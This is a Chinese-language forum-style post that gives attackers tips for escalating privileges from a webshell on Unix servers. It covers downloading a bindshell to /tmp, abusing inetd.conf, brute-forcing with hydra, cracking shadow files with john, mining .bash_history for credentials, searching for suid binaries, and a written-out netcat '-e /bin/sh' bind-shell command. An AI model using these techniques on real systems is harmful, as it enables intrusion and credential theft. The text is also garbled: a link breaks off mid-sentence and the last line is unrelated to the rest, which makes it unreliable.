unix的webshell权限提升方法

大部分技巧都源于我家那位才华横溢的eong大大。

想要获取bindshell，你可以使用wget将其下载到/tmp/目录下。在/etc/inetd.conf文件可写的情况下，你还可以直接开启一个交互式shell。至于编译工作，gcc是你的得力助手。

关于文件显示，一个简单的命令就能实现。比如"_num=5466654&board=rebarz99&command=down_load&filename=rb9.txt"，之后使用ls -al来显示文件。其中，"||"是显示的命令。想要获取用户信息，其实有一个很简单的方法：使用hydra猜测密码。有时思路混乱时可能会误打成john跑shadow。你可能会疑惑，已经有了shell，为何还要跑普通用户的密码（root通常不能登录）。这是因为我们需要查看.bash_history及其他资料，获取一个能通过ssh/ftp/telnet登录的账号。在某些情况下，如利用proftpd_0day漏洞，需要一个能正常登录的账号。没有webshell的话，因为连用户名(/etc/passwd)都不知道，获取用户信息会变得困难。.bash_history很可能已经包含了所需的user/pass，例如mysql的，以及管理员访问的其他服务器信息。并非所有机器的访问限制都那么宽松。对于某些机器来说，/home对任何人都是可读的。但我们必须考虑所有可能性。

如果你所知道的所有漏洞都被修复了，面对所有的suid感到束手无策时，或许可以通过一个可以su -的账号骗出root权限。对于我个人而言，使用john跑shadow是为了完善自己的密码/密码规则库。

至于netcat和pipe的结合使用，我尚未有过经验。在此诚心请教，期待你的指导。

给blackfox的建议：搜索suid是非常必要的。这不仅是为了利用一个suid程序进行攻击，更反映了管理员的安全意识水平。如今可能仍有suidshell的存在。

还有一个技巧：使用`exec`命令结合`nc`（一个用于TCP通信的工具）来创建一个反向shell连接。例如，“exec`nc -l -n -p 60000 -e /bin/sh`”，这将为你提供一个shell环境。关于nc的下载地址，你可以访问[这里](

至于mysql的ip禁止连接设置方法，首先通过命令“find / -name myf -print”找到配置文件，然后使用mysql命令来设置用户名、IP和密码。例如，“mysql> grant all on . to username@IP identified by 'password';”。用cambrian渲染body部分。